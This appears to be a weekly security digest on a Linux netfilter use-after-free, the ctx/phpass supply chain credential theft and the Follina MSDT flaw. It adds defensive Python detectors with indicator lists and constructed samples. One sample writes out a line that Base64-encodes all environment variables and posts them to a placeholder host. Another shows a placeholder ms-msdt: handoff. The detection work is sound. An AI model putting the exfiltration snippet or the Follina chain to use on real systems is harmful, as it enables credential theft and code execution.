In this week’s security digest we cover three items: a use-after-free in the Linux kernel that allows local privilege escalation, a software supply chain attack carried out through two abandoned open source packages, and Follina, a zero-day in Microsoft Windows reached through Office documents.
Linux Kernel use-after-free in netfilter subsystem
A use-after-free write vulnerability was identified in the Linux kernel netfilter subsystem. Triggering it requires only the ability to create user and network namespaces, which unprivileged users have by default on many distributions, so a local user can exploit it to escalate privileges to root on affected systems.
The root cause is that an expression is destroyed without first being removed from the bindings list of the set it refers to. Several expression types are affected; at a minimum the “lookup” and “dynset” expressions are.
The bindings list therefore keeps a pointer to the freed expression, and any later traversal or modification of that list writes a list link pointer into a slab object that has already been freed and may since have been reallocated for something else. For in-depth details, refer to the original disclosure by the researcher. The fix was committed to the kernel on May 26, 2022.
Software supply chain attack using “ctx” and “phpass”
Two malicious packages, one Python and one PHP, have been uncovered carrying out a software supply chain attack on the open source ecosystem. The first is “ctx,” a Python module distributed through the PyPI repository. The second is “phpass,” a PHP package whose GitHub repository was forked to distribute a rogue update.
A malicious update to “ctx” was published on May 21, 2022. Both packages are unmaintained: the last legitimate release of “ctx” dates from December 19, 2014, and that of “phpass” from August 31, 2012. At their core the modifications are designed to exfiltrate AWS credentials to a Heroku URL; it appears the perpetrator collects all environment variables, Base64-encodes them and forwards the data to a web application under the perpetrator’s control.
The responsible individual hijacked the abandoned PyPI account of the “ctx” maintainer by purchasing the maintainer’s expired domain and sending himself a password reset link. Any account whose recovery email address lives on a lapsed domain is exposed in exactly the same way.
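The behaviour described above (read the whole environment, Base64-encode it, send it out over HTTP) is a pattern that can be hunted for statically before a freshly updated dependency is installed. The scanner below is an added example, not code from the ctx or phpass packages or their researchers; the indicator lists and the two sample modules are constructed for illustration, and the collector host in the suspicious sample is a placeholder. It resolves import aliases so that `from urllib import request as ur` still counts as `urllib.request`, and it only raises a verdict when all three stages appear in one module.

```python
"""Heuristic static check for env-dump + Base64 + HTTP exfiltration in Python source."""
import ast

# Fully qualified names that make up the three stages of the pattern (constructed list).
INDICATORS = {
    "env_read": ("os.environ", "os.getenv"),
    "encode": ("base64.b64encode", "base64.urlsafe_b64encode"),
    "network": ("requests.get", "requests.post", "requests.put",
                "urllib.request.urlopen", "urllib.request.Request",
                "http.client.HTTPConnection", "http.client.HTTPSConnection"),
}


def _dotted(node):
    """Turn a Name/Attribute chain such as a.b.c into the string "a.b.c", else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return None  # chain rooted in a call result, subscript, etc.
    parts.append(node.id)
    return ".".join(reversed(parts))


def _import_aliases(tree):
    """Map local names to the fully qualified names they were imported as."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                if a.asname:                      # import urllib.request as ur
                    aliases[a.asname] = a.name
                else:                             # import urllib.request binds "urllib"
                    root = a.name.split(".")[0]
                    aliases[root] = root
        elif isinstance(node, ast.ImportFrom) and node.level == 0 and node.module:
            for a in node.names:
                if a.name != "*":                 # from os import environ as e
                    aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    return aliases


def _resolve(dotted, aliases):
    head, sep, rest = dotted.partition(".")
    if head in aliases:
        return aliases[head] + (sep + rest if rest else "")
    return dotted


def _matches(name, indicator):
    return name == indicator or name.startswith(indicator + ".")


def scan_source(source):
    """Return the indicators found per stage and a verdict.

    All three stages together are the trigger; any one alone is ordinary code.
    """
    tree = ast.parse(source)
    aliases = _import_aliases(tree)
    found = {stage: set() for stage in INDICATORS}
    for node in ast.walk(tree):
        if not isinstance(node, (ast.Name, ast.Attribute)):
            continue
        dotted = _dotted(node)
        if dotted is None:
            continue
        full = _resolve(dotted, aliases)
        for stage, names in INDICATORS.items():
            for indicator in names:
                if _matches(full, indicator):
                    found[stage].add(indicator)
    return {
        "indicators": {stage: sorted(v) for stage, v in found.items()},
        "suspicious": all(found.values()),
    }


# Constructed sample: reads one setting and calls an API. Two stages, no encoded dump.
BENIGN_SAMPLE = '''
import os
import requests

def fetch_status(base_url):
    token = os.getenv("SERVICE_TOKEN")
    return requests.get(base_url + "/status", headers={"Authorization": token})
'''

# Constructed sample mirroring the described behaviour; NOT the real payload.
SUSPICIOUS_SAMPLE = '''
import os, base64
from urllib import request as ur

def _beacon():
    blob = base64.b64encode(repr(dict(os.environ)).encode())
    ur.urlopen(ur.Request("https://collector.example.invalid/", data=blob))
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SAMPLE), ("suspicious", SUSPICIOUS_SAMPLE)):
        print(label, scan_source(src))
```

This is a co-occurrence heuristic, not a taint analysis: a legitimate diagnostics client that posts an encoded environment snapshot will trip it, and a payload that builds names with `getattr` or decodes them from strings at runtime will slip past it. Use it as a triage step on a release that appears after years of silence, alongside pinning dependencies by hash so that such a release cannot be pulled in silently.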
Follina – RCE vulnerability in Microsoft Support Diagnostic Tool (MSDT) in Windows
CVE-2022-30190 is a remote code execution vulnerability that is triggered when MSDT is invoked through its URL protocol handler from a calling application such as Word. In the observed attack, a malicious document uses Word’s remote template feature to retrieve an HTML file from a remote web server; that HTML in turn uses the ms-msdt: MSProtocol URI scheme to launch MSDT with parameters that execute attacker-supplied PowerShell. It was exploited as a zero-day against Office products before a patch was available.
An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user’s rights.
Microsoft says the flaw affects all Windows versions still receiving security updates (Windows 7 and later, Windows Server 2008 and later). According to the vendor, administrators and users can block attacks exploiting CVE-2022-30190 by disabling the MSDT URL protocol, which the attackers rely on to launch troubleshooters and execute code on vulnerable systems. Refer to Microsoft’s security guidance for the steps to disable the MSDT URL protocol on a Windows device; the workaround consists of exporting a backup of the HKEY_CLASSES_ROOT\ms-msdt registry key and then deleting it. Once Microsoft releases a patch, apply it and then undo the workaround by restoring the exported key.
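The delivery chain described above has two observable stages that a mail gateway or incident responder can check for: a Word document whose attached template points at an external http(s) URL, and a fetched HTML page that hands off to the ms-msdt: URI scheme. The checks below are an added example, not Microsoft’s guidance or any researcher’s code. The sample document is a constructed stand-in containing only the relationship part that Word reads for the template, and the sample HTML carries a placeholder diagnostic id and parameter rather than a working payload.

```python
"""Detect the two stages of a Follina-style chain: remote template, then ms-msdt: URI."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
SETTINGS_RELS = "word/_rels/settings.xml.rels"

# An ms-msdt: URI inside a JavaScript string literal: consume escaped characters,
# stop at the first unescaped quote or line break.
MSDT_URI = re.compile(r"ms-msdt:(?:\\.|[^\"'\\\n])*", re.IGNORECASE)


def external_templates(docx_bytes):
    """Return http(s) attached-template targets from word/_rels/settings.xml.rels.

    Local and file:// templates, the common legitimate case, are ignored.
    """
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if SETTINGS_RELS not in zf.namelist():
            return []
        root = ET.fromstring(zf.read(SETTINGS_RELS))
    hits = []
    for rel in root.iter(f"{{{REL_NS}}}Relationship"):
        if rel.get("Type") != ATTACHED_TEMPLATE or rel.get("TargetMode") != "External":
            continue
        target = rel.get("Target", "")
        if re.match(r"https?://", target, re.IGNORECASE):
            hits.append(target)
    return hits


def msdt_uris(html):
    """Return every ms-msdt: URI found in fetched HTML or script text."""
    return [m.group(0) for m in MSDT_URI.finditer(html)]


def is_follina_chain(docx_bytes, fetched_html):
    """True only when both stages are present: remote template and ms-msdt: handoff."""
    return bool(external_templates(docx_bytes)) and bool(msdt_uris(fetched_html))


def build_sample_docx(template_target, external=True):
    """Constructed stand-in for a .docx holding only the relationship part the check reads."""
    mode = ' TargetMode="External"' if external else ""
    rels = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            f'<Relationships xmlns="{REL_NS}">'
            f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
            f'Target="{template_target}"{mode}/></Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(SETTINGS_RELS, rels)
    return buf.getvalue()


# Constructed HTML: placeholder diagnostic id and parameter, not a working payload.
SAMPLE_HTML = """<html><body><script>
window.location.href = "ms-msdt:/id SomeDiagnostic /skip force /param \\"PLACEHOLDER\\"";
</script></body></html>"""

if __name__ == "__main__":
    remote = build_sample_docx("http://templates.example.com/rd.html")
    local = build_sample_docx("file:///C:/Users/alice/AppData/Roaming/Microsoft/Templates/Normal.dotm")
    print("remote template:", external_templates(remote))
    print("local template: ", external_templates(local))
    print("msdt uris:      ", msdt_uris(SAMPLE_HTML))
    print("chain:", is_follina_chain(remote, SAMPLE_HTML), is_follina_chain(local, SAMPLE_HTML))
```

An external http(s) template on its own is a weak signal, since corporate template servers exist; an ms-msdt: URI in content fetched by a document is the stronger one, and together they match the chain described above. Neither check replaces the registry workaround or the patch, which remove the handler the chain depends on.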